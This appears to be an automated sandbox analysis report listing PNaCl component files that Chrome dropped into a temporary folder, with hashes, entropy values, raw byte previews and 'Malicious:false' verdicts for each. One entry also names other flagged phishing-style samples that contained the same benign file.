                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):173
                                                                                                                                                            Entropy (8bit):4.479129266715852
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:rR6TAulhFphifFRxJ1KnOFgS1BEeSWU4pv/8F/FxLj2RF2fcTZTotL:F6VlMDf1KqgS12WfB0NpK4aotL
                                                                                                                                                            MD5:D354060BBF9C1C00C45EFD9A5D7265E5
                                                                                                                                                            SHA1:8A6B296FA53516F82819655F00AA88E54D359B30
                                                                                                                                                            SHA-256:9AAE4B926C0FADACD333FBC600DA4140803526DB3AB2A90EBFE734DE65952668
                                                                                                                                                            SHA-512:BF5AF3A57A05E4ABBC9C0CF3675B7744940068D6C1309A3562106FAC747D4A6D8B2029027C85C1479AA26AADBE8DA11E6A5476E3C8C3808EEA33C2A666239764
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "fileTypePolicies",. "version": "51",. "imageName": "image.squash",. "squash": true,. "fsType": "squashfs",. "isRemovable": false.}

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_1416056523\_metadata\verified_contents.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3034
                                                                                                                                                            Entropy (8bit):5.876664552417901
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:p/hEc9q0S+UTKYM43z8nqMsfWRUWEADM/W9n7lqFkakzcVTGkcYTPi6zM:RGcg5z/jjjHgUnV278+aWLy4
                                                                                                                                                            MD5:8B6C3E16DFBF5FD1C9AC2267801DB38E
                                                                                                                                                            SHA1:F5CADC5914DF858C96C189B092BC89C29407BBAA
                                                                                                                                                            SHA-256:FD986A547D9585E98F451B87CA85DEB4B61EE540C6FAC678D7BEDABF04653095
                                                                                                                                                            SHA-512:37048EF8FADF62A26CAEC6EE90AC192429AB1E99424E5C68FACA90C0DAD68642C761FDCAC03FC38FA930841F91FA145A6943EC7F168D4F2FA426F1F092C2F502
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJfcGxhdGZvcm1fc3BlY2lmaWMveDg2XzY0L3BuYWNsX3B1YmxpY19wbmFjbF9qc29uIiwicm9vdF9oYXNoIjoiVkNUSHNJVHNUSXVncWNhV2ctWHVpTU1sdWloV1FSTE1sQnpTTGprdGhETSJ9LHsicGF0aCI6Il9wbGF0Zm9ybV9zcGVjaWZpYy94ODZfNjQvcG5hY2xfcHVibGljX3g4Nl82NF9jcnRiZWdpbl9mb3JfZWhfbyIsInJvb3RfaGFzaCI6ImxINWt2a1BvSVZZczZKVHhyOHc5Q2MxXzloVEJCX3lVSlF6VDZseVVNd0kifSx7InBhdGgiOiJfcGxhdGZvcm1fc3BlY2lmaWMveDg2XzY0L3BuYWNsX3B1YmxpY194ODZfNjRfY3J0YmVnaW5fbyIsInJvb3RfaGFzaCI6IkVuLVFQTW1HUm1xbG9Ud1gzOTAzckpsMkw0R25sQmdET1FhZlNKaHJ4Nk0ifSx7InBhdGgiOiJfcGxhdGZvcm1fc3BlY2lmaWMveDg2XzY0L3BuYWNsX3B1YmxpY194ODZfNjRfY3J0ZW5kX28iLCJyb290X2hhc2giOiJkT2lJVzRmdEdGNW9FY0k1UXYyYjBmdXNrUlYyaUVtdmxhbmV6MlpFc3VvIn0seyJwYXRoIjoiX3BsYXRmb3JtX3NwZWNpZmljL3g4Nl82NC9wbmFjbF9wdWJsaWNfeDg2XzY0X2xkX25leGUiLCJyb290X2hhc2giOiIzNEU5QU9EMmpqLWNoMzZQZ0NVV0YtMUpYWVhVdlNGY1I4bks1aWppcWNjIn0seyJwYXRoIjoiX3B

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_pnacl_json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):507
                                                                                                                                                            Entropy (8bit):4.68252584617246
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TjLJ7qaVgPPd8bdzQBXefosmc5T9+n6e1Cetm1JXcAwA:TJ7jViPOd8wfHmZ6RP15
                                                                                                                                                            MD5:35D5F285F255682477F4C50E93299146
                                                                                                                                                            SHA1:FB58813C4D785412F05962CD379434669DE79C2B
                                                                                                                                                            SHA-256:5424C7B084EC4C8BA0A9C69683E5EE88C325BA28564112CC941CD22E392D8433
                                                                                                                                                            SHA-512:59DF2D5F2684FACC80C72F9C4B7E280F705776076C9D843534F772D5A3D578BEE04289AEE81320F23FB4D743F3969EDF5BA53FEBBAC8A4D27F3BC53BCF271C3E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{. "COMMENT": [. "This file serves as a template for the resource info description used by ", . "the NaCl Chrome plugin. It is kept in the NaCl repository to prevent ", . "hard-coding of NaCl-specific information inside the Chrome repository.". ], . "abi-version": 1, . "pnacl-arch": "x86-64", . "pnacl-ld-name": "ld.nexe", . "pnacl-llc-name": "pnacl-llc.nexe", . "pnacl-sz-name": "pnacl-sz.nexe", . "pnacl-version": "5dfe030a71ca66e72c5719ef5034c2ed24706c43".}

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_for_eh_o

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2712
                                                                                                                                                            Entropy (8bit):3.4025803725190906
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:b/5D5V5PK82aTS6aTTw0Do1DttoyDNsEA:b/hbVic1ZtLDNsE
                                                                                                                                                            MD5:604FF8F351A88E7A1DBD7C836378AE86
                                                                                                                                                            SHA1:9D8D89AE9F13D6306E619A4EAAD51EDE91A5F9F3
                                                                                                                                                            SHA-256:947E64BE43E821562CE894F1AFCC3D09CD7FF614C107FC94250CD3EA5C943302
                                                                                                                                                            SHA-512:85B1EDA4C473E00034EE627B7ABB894A77E521BC6A91A91A4A3744CA7511CB0AF10B9723D9ECC2CE3378DD70B659DF842D8C11875958CB77070CF01EC0A15840
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.ELF..............>.................................@.....@.......................................PH.......,$J.l=....J.$<A[..@.A...M..A..ffffff..................PH......,$J.l=....J.$<A[..D..A...M..A..ffffff..................PH..1..,$J.l=....J.$<A[.......A...M..A..ffffff..................PH..SP..h.........fff...................h.........fff.............J.$<[.,$J.l=....J.$<.....f.....................................................................................................................................................................................NaCl....x86-64...........zR..x......................@....C....C.........8.......@....C....C.........T.......@....C....C.........p.......`....C....C..B...... .......................<...............@.......X.......................t........................clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pna

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_o

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2776
                                                                                                                                                            Entropy (8bit):3.5335802354066246
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:b/5D5V5ej5ej5PjDdaTS6aTTw6DV1DtFouoyDOsTy:b/hbEEVJB1ZFhLDOsT
                                                                                                                                                            MD5:88C08CD63DE9EA244F70BFC53BBCADF6
                                                                                                                                                            SHA1:8F38A113A66B18BAA02E2C995099CF1145A29DAA
                                                                                                                                                            SHA-256:127F903CC986466AA5A13C17DFDD37AC99762F81A794180339069F48986BC7A3
                                                                                                                                                            SHA-512:78D2500493A65A23D101EC2420DC5F0CE8C75EFAC425C28547121643E4FB568E9D827EF2C0F7068159E043C86B986F29BF92C6BADC675F160B63C7B3512EB95F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.ELF..............>.....................X...........@.....@.......................................PH.......,$J.l=....J.$<A[..@.A...M..A..ffffff..................PH......,$J.l=....J.$<A[..D..A...M..A..ffffff..................PH..1..,$J.l=....J.$<A[.......A...M..A..ffffff..................PH..,$J.l=....J.$<A[f........A...M..A..ffffff..................PH..,$J.l=....J.$<A[f........A...M..A..ffffff..................PH..SP..h.........fff.............J.$<[.,$J.l=....J.$<.....f.K...............`.......P.......................z...................................NaCl....x86-64...clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f)............zR..x......................@....C....C.........8.......@....C....C.........T.......@....C....C.........p.......@....C....C.................@....C....C.................@...

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_crtend_o

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1520
                                                                                                                                                            Entropy (8bit):2.799960074375893
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:Bvx/ekjlM/NQQmTfR9yp9396QQmTfR9C6wRqD8MTDDw7lEOkSbfuEAXwX6BX2U8b:bDjO/NbmT3296bmT3Twk8qDwh7b7CD8
                                                                                                                                                            MD5:75E79F5DB777862140B04CC6861C84A7
                                                                                                                                                            SHA1:4DB7BDC80206765461AC68CEC03CE28689BBEE0C
                                                                                                                                                            SHA-256:74E8885B87ED185E6811C23942FD9BD1FBAC9115768849AF95A9DECF6644B2EA
                                                                                                                                                            SHA-512:FE3F86E926759E71494F2060C4ED3C883EBCAF20CB129A5AD7F142766C33FAB10B5FABC3C7C938E0E895E27EA0AC03CBFE8D0EEABF5300A4AD07F67FD96CC253
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.ELF..............>.................................@.....@.........................NaCl....x86-64.......clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f)...text..comment..bss..group..note.GNU-stack..eh_frame..shstrtab..strtab..symtab..data..note.NaCl.ABI.x86-64.......................................................!................................................................................................................................................................................................../../../pnacl/support/crtend.c.__EH_FRAME_END__...............................................................................................@...............................................................H.......................................P.......................H...............................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_ld_nexe

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=7511538a3a6a0b862c772eace49075ed1bbe2377, stripped
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2163864
                                                                                                                                                            Entropy (8bit):6.07050487397106
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:HPHonIwYZJ0ykwVO7Owf31yJKzCtxO8RSV4lY+PbeHVxCtjFV4lBNeSAmfGqa+A7:HvSMRwf3SKmlY+PyPvnM2Gq+
                                                                                                                                                            MD5:0BB967D2E99BE65C05A646BC67734833
                                                                                                                                                            SHA1:220A41A326F85081A74C4BB7C5F4E115D1B4B960
                                                                                                                                                            SHA-256:C6C2D0C2FC3E38A9BFA19C78066439C2F745393F1FD1C49C3C6777F697222C76
                                                                                                                                                            SHA-512:8EF8689E00E4B210A30444D18ED6247F364995ABEB2FD272064C3AF671EEDB4D9B8B67CA56F72FEBF8F56896D4EA7EC4B10CB445FFA1C710C1F312E9DA0E4896
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                            • Filename: , Detection: malicious, Browse
                                                                                                                                                            • Filename: DocusignMessage#60666.html, Detection: malicious, Browse
                                                                                                                                                            • Filename: Voicewav.htm, Detection: malicious, Browse
                                                                                                                                                            • Filename: , Detection: malicious, Browse
                                                                                                                                                            • Filename: Invoice.html, Detection: malicious, Browse
                                                                                                                                                            • Filename: eSecure_Paperwork Shipment for johnson.cheng@multek.com.html, Detection: malicious, Browse
                                                                                                                                                            • Filename: vbscript.html, Detection: malicious, Browse
                                                                                                                                                            • Filename: nF0trs9UzA.html, Detection: malicious, Browse
                                                                                                                                                            • Filename: Indegene Purchase Order PO 6992.html, Detection: malicious, Browse
                                                                                                                                                            • Filename: Quaterly Due Invoice.HTML, Detection: malicious, Browse
                                                                                                                                                            • Filename: ScannedDocs_827440369.html, Detection: malicious, Browse
                                                                                                                                                            • Filename: INVOICE DUE.xlsx, Detection: malicious, Browse
                                                                                                                                                            • Filename: 24205 (1).html, Detection: malicious, Browse
                                                                                                                                                            • Filename: ScannedDocs_576516735.html, Detection: malicious, Browse
                                                                                                                                                            • Filename: , Detection: malicious, Browse
                                                                                                                                                            • Filename: html_from.html, Detection: malicious, Browse
                                                                                                                                                            • Filename: invoice-RU000523561S4_.html, Detection: malicious, Browse
                                                                                                                                                            • Filename: minero.min.html, Detection: malicious, Browse
                                                                                                                                                            • Filename: #U260e#Ufe0fmessage 79903930.htm, Detection: malicious, Browse
                                                                                                                                                            • Filename: , Detection: malicious, Browse
                                                                                                                                                            Preview:.ELF..............>..... .......@.........!.........@.8...@......................................................................................................................................................{......W...............................................@.......@...............P.td.....h.......h.......h......4b......4b..............Q.td................................................................NaCl....x86-64..............GNU.u.S.:j..,w...u...#w.......?......Y@.......@......1@......B@......P@.....@X@.....``@......h@.....pp@.....H.@.......@.......@.......@.......@.......@....`..@.......@.......A.......A......................p................@..............?.......A.........5.....?5.5...?.5.....?......P9..............PC.......?......0@................aCoc...?..`.(..?.y.P.D.?<.s..O.u......$@.......@...............@........................................ ... ....... .......@...`...`...`...`...................`...`...`...`...`...`...`...................................`...

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_libcrt_platform_a

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:current ar archive
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40552
                                                                                                                                                            Entropy (8bit):4.127255967843258
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:xlP+1fzyUNVU5LmKxeOnjpD5eA/eUnUUxvT:xlP+1ryYMTekpD5eAWjuvT
                                                                                                                                                            MD5:0CE951B216FCF76F754C9A845700F042
                                                                                                                                                            SHA1:6F99A259C0C8DAD5AD29EE983D35B6A0835D8555
                                                                                                                                                            SHA-256:7A1852EA4BB14A2A623521FA53F41F02F8BA3052046CF1AA0903CFAD0D1E1A7B
                                                                                                                                                            SHA-512:7C2F9BF90EB1F43C17B4E14A077759FA9DC62A7239890975B2D6FD543B31289DC3B49AE456CA73B98DE9AC372034F340C708D23D9D3AAB05CCBDABDC56A6314E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:!<arch>./ 0 0 0 0 624 `...................,...8...Z(..e...e...t...t...y`..y`..y`..y`..y`..y`..y`..y`..y`..y`..y`..y`..y`..y`........................fmod.fmodf.memcmp.memcpy.memmove.memset.__nacl_read_tp.__pnacl_init_irt.longjmp.setjmp.__Sz_fptosi_f32_i64.__Sz_fptosi_f64_i64.__Sz_fptoui_f32_i32.__Sz_fptoui_f32_i64.__Sz_fptoui_f64_i32.__Sz_fptoui_f64_i64.__Sz_sitofp_i64_f32.__Sz_sitofp_i64_f64.__Sz_uitofp_i32_f32.__Sz_uitofp_i32_f64.__Sz_uitofp_i64_f32.__Sz_uitofp_i64_f64.nacl_tp_tdb_offset.nacl_tp_tls_offset.__Sz_bitcast_16xi1_i16.__Sz_bitcast_8xi1_i8.__Sz_bitcast_i16_16xi1.__Sz_bitcast_i8_8xi1.__Sz_fptoui_4xi32_f32.__Sz_uitofp_4xi32_4xf32..e_fmod.o/ 0 0 0 644 2792 `..ELF..............>.....................(...........@.....@.......................................PH..AVAUATSfI.~.M..I.. E....@.A......D..D1.......8fI.~.M.....I.. E..A......D..D..t.D....D..f....D..=....r...Y...^.[A\A]A^..@..,$J.l=....J.$<A[A...M..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_libgcc_a

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:current ar archive
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):132784
                                                                                                                                                            Entropy (8bit):3.6998481247844937
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:Hf0mOXYmeKzQUIdedRFvT5p1Ee2HyAlL3O4:Hf7OXdmWRJT5p1R2HyAhO4
                                                                                                                                                            MD5:C37CA2EB468E6F05A4E37DF6E6020D0F
                                                                                                                                                            SHA1:EA787E5EADFB488632EC60D8B80B555796FA9FE9
                                                                                                                                                            SHA-256:C1483ED423FEE15D86E8B5D698B2CDAB89186CE7FF9C4E3D5F3F961FD80D7C6E
                                                                                                                                                            SHA-512:01281DE92B281FB29E1ACA96AA64B740B65CC3A9097307827F0D8DB9E1C164C56AFCDFA0BF138EA670A596D55CE2C8D722760744E9FC9343BB6514417BF333BA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:!<arch>./ 0 0 0 0 942 `....;...|.......4...x..#...-...4l..E...M...U...]...n...u...~X...4.......................L......................t...p...............`......"...*...1...:...D...K...T...\...d...r|..|0.......x...........L.......\...8..........................__clzti2.__compilerrt_fmax.__compilerrt_fmaxf.__compilerrt_logb.__compilerrt_logbf.__ctzti2.__divdc3.__divdi3.__divmoddi4.__divmodsi4.__divsc3.__divsi3.__divti3.__fixdfdi.__fixdfsi.__fixdfti.__fixsfdi.__fixsfsi.__fixsfti.__fixunsdfdi.__fixunsdfsi.__fixunsdfti.__fixunssfdi.__fixunssfsi.__fixunssfti.__floatdidf.__floatdisf.__floatsidf.__floatsisf.__floattidf.__floattisf.__floatundidf.__floatundisf.__floatunsidf.__floatunsisf.__floatuntidf.__floatuntisf.compilerrt_abort_impl.__moddi3.__modsi3.__modti3.__muldc3.__muloti4.__mulsc3.__multi3.__popcountdi2.__popcountsi2.__popcountti2.__powidf2.__powisf2.__udivdi3.__udivmoddi4.__udivmodsi4.__udivmodti4.__udivsi3.__udivti3.__umoddi3.__umodsi3.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_a

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:current ar archive
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13514
                                                                                                                                                            Entropy (8bit):3.8217211433441904
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:uU9v4pXizdrEuxwk3vp20tprpdSGFwDqO:P9v4palvvc0tpFdSGFwmO
                                                                                                                                                            MD5:4E8BEDA73EB7BD99528BF62B7835A3FA
                                                                                                                                                            SHA1:DC0F263A7B2A649D11FF7B56FE9CFAC44F946036
                                                                                                                                                            SHA-256:6B835FD48DF505EB336FF6518CE7B93BB0ED854DADAA5C1EEED48D420291F62C
                                                                                                                                                            SHA-512:46116B8BABC719676D68FD40D2AC82F38A3D13D8A482ADFC6FC32A99170AC3420E52CC33242CCD0FA723ABF4FA5EDBB9CE16A09C729BF04AE4AFBB2F67A1E38B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:!<arch>./ 0 0 0 0 94 `................._pnacl_wrapper_start.__pnacl_real_irt_query_func.__pnacl_wrap_irt_query_func..shim_entry.o/ 0 0 0 644 7392 `..ELF..............>..................... ...........@.....@.........................NaCl....x86-64..................................A.L....A.L...D...........D....A.....t+.. u..t"..A.D..........A... .....A.D...........f..D..<.......................Q.......................V.......................clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f).../../ppapi/native_client/src/untrusted/pnacl_irt_shim/shim_entry.c./mnt/data/b/build/slave/sdk/build/src/out_pnacl/x64.NACL_STARTUP_FINI.NACL_STARTUP_ENVC.NACL_STARTUP_ARGC.NACL_STARTUP_ARGV.NaClStartupInfoIndex.unsigned int.size_t.char.TYPE_na

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_libpnacl_irt_shim_dummy_a

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:current ar archive
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2078
                                                                                                                                                            Entropy (8bit):3.21751839673526
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:MOcpdhWE5O/bZbmT3296bmT3TwQwDnvD/+R3:MHuECdaTS6aTTwXDvD/+l
                                                                                                                                                            MD5:F950F89D06C45E63CE9862BE59E937C9
                                                                                                                                                            SHA1:9CFAD34139CC428CE0C07A869C15B71A9632365D
                                                                                                                                                            SHA-256:945B1C8A1666CBF05E8B8941B70D9D044BAAFB59B006F728F8995072DE7C4C40
                                                                                                                                                            SHA-512:F9AFBB800A875EDCC63DEA4986179E73632B3182951A99C8B3D37DB454EFD7CC7192ECA5AC87514918A858BAD6DAEAB59548CA2E90EADA9900EF5B9F08E62CFC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:!<arch>./ 0 0 0 0 30 `........._pnacl_wrapper_start..// 20 `.dummy_shim_entry.o/./0 0 0 0 644 1840 `..ELF..............>.................................@.....@.......................................PH..,$J.l=....J.$<.....f..D......................................NaCl....x86-64...clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f)............zR..x...................... ....C....C..... .........................rela.text..comment..bss..group..note.GNU-stack..rela.eh_frame..shstrtab..strtab..symtab..data..note.NaCl.ABI.x86-64.....................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_llc_nexe

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=309d6d3d463e6b1b0690f39eb226b1e4c469b2ce, stripped
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):14091416
                                                                                                                                                            Entropy (8bit):5.928868737447095
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:196608:tKVqXp3Qev4dg6ilfHM8KLM2J3jqjnkZ:uqufB
                                                                                                                                                            MD5:9B159191C29E766EBBF799FA951C581B
                                                                                                                                                            SHA1:D1D4BBC63AB5FC1E4A54EB7B82095A6F2CE535EE
                                                                                                                                                            SHA-256:2F4A3A0730142C5EE4FA2C05D27A5DEFC18886A382D45F5DB254B61B28ED642B
                                                                                                                                                            SHA-512:0B4FF60B5428F81B8B1BCF3328CF80CBD88D8CE5E8BDBC236B06D5A54E7CF26168A3ABB348D87423DA613AB3F0B4D9B37CB5180804839F1CA158EC2B315DDF00
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.ELF..............>..... .......@...................@.8...@...............$.....................................................................................................................!.......!......'......G...............................................@.......@...............P.td............................D.......D...............Q.td................................................................NaCl....x86-64..............GNU.0.m=F>k....&...i........................0C......0C..0C..0E..............0C......0E.-DT.!.?.-DT.!.........................?........-DT.!...-DT.!.?.......?......................?..............?."..."..."..."......@.......`...................... ...@...`...................... ...@...`...................... ...@...`...................... ...@...`.......................................`... ...@...`...........`...`.......@...@....... ....1..`3.. 4..`-..`-...:...:...F..@H..`H...H...F...F...G...H.. H...F..@G...I.. I..@I..@G...G...I...I...J...G..`I..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_1416056523\_platform_specific\x86_64\pnacl_public_x86_64_pnacl_sz_nexe

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=4b15de4ab227d5e46213978b8518d53c53ce1db9, stripped
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1901720
                                                                                                                                                            Entropy (8bit):5.955741933854651
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:gXqUSpBjwQO2o8k+7zjidg4euCAauOILffvCpGy4Wh3BTFmHpq82K2/KsvPyla9d:gafZwcOdNe2auOepCBTFmJq3Kf8ksr
                                                                                                                                                            MD5:9DC3172630E525854B232FF71499D77C
                                                                                                                                                            SHA1:0082C58EDCE3769E90DB48E7C26090CE706AD434
                                                                                                                                                            SHA-256:6AA1DA6C264E0AF4E32A004F4076C7557C6AC6D9C38B0C5DE97302D83FA248C3
                                                                                                                                                            SHA-512:9E9584241A39EED1463D7D4C1B26AE570B839AA315778FF3400C61341EBA43B630307DE9F1532A265CA82EA69BDEA03EC9D963E59A18569C02DA8285449870FE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.ELF..............>..... .......@...................@.8...@.............................................................................................0.......0................................................Y......................................................@.......@...............P.td....t^......t^......t^.......W.......W..............Q.td................................................................NaCl....x86-64..............GNU.K..J.'..b......<S...`...`... ...@...@.......@.............................................Y@......................p................@.......?..............?.......A.........5.....?5.5...?.5.....?......P9..............PC.......?......0@................aCoc...?..`.(..?.y.P.D.?<.s..O.u......$@.......@...............@`...`.......@.................................................. ...`... ... .......`................... ... ...@...`.......................@... Z...[...[...e.......... ...@... ...@...`........0...0...2..`4.. 6...7...9...~...~...z...{...{..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_1416056523\manifest.fingerprint

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):66
                                                                                                                                                            Entropy (8bit):3.928261499316817
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:STDLGswXEVBcVdBiTDt3zLsW:SPLGLErcVdBiDtf3
                                                                                                                                                            MD5:C00BCE97F21B1AD61EB9B8CD001795EE
                                                                                                                                                            SHA1:8E0392FF3DB267D847711C3F4E0D7468060E1535
                                                                                                                                                            SHA-256:59F06F04230E32E8BC839F45B984D31D611930427B631C963D09E7064A602363
                                                                                                                                                            SHA-512:9930E44A6ECC62505DBADCEED5E05645909FF09816FB12AAC0414E6D2830AC09758366C3B7D4EDD7839C87EB16DFA4C66D8981AE6237D408B37135C3506F4CD2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:1.6f6bc93dcd62dc251850d2ff458fda96083ceb7fbe8eeb11248b8485ef2aea23

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_1416056523\manifest.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):573
                                                                                                                                                            Entropy (8bit):4.859567579783832
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:BLqG6yDJmL4mLDlG9hQ181G46XzrXc+EFfNqpaiOc+T5NqXIOclNqXL:BkylmL4mLDlJ18116XsRNqtZeNqXIZlE
                                                                                                                                                            MD5:1863B86D0863199AFDA179482032945F
                                                                                                                                                            SHA1:36F56692E12F2A1EFCA7736C236A8D776B627A86
                                                                                                                                                            SHA-256:F14E451CE2314D29087B8AD0309A1C8B8E81D847175EF46271E0EB49B4F84DC5
                                                                                                                                                            SHA-512:836556F3D978A89D3FC1F07FCED2732A17E314ED6A021737F087E32A69BFA46FD706EBBDFD3607FF42EDCB75DC463C29B9D9D2F122504F567BB95844F579831B
                                                                                                                                                            Malicious:false
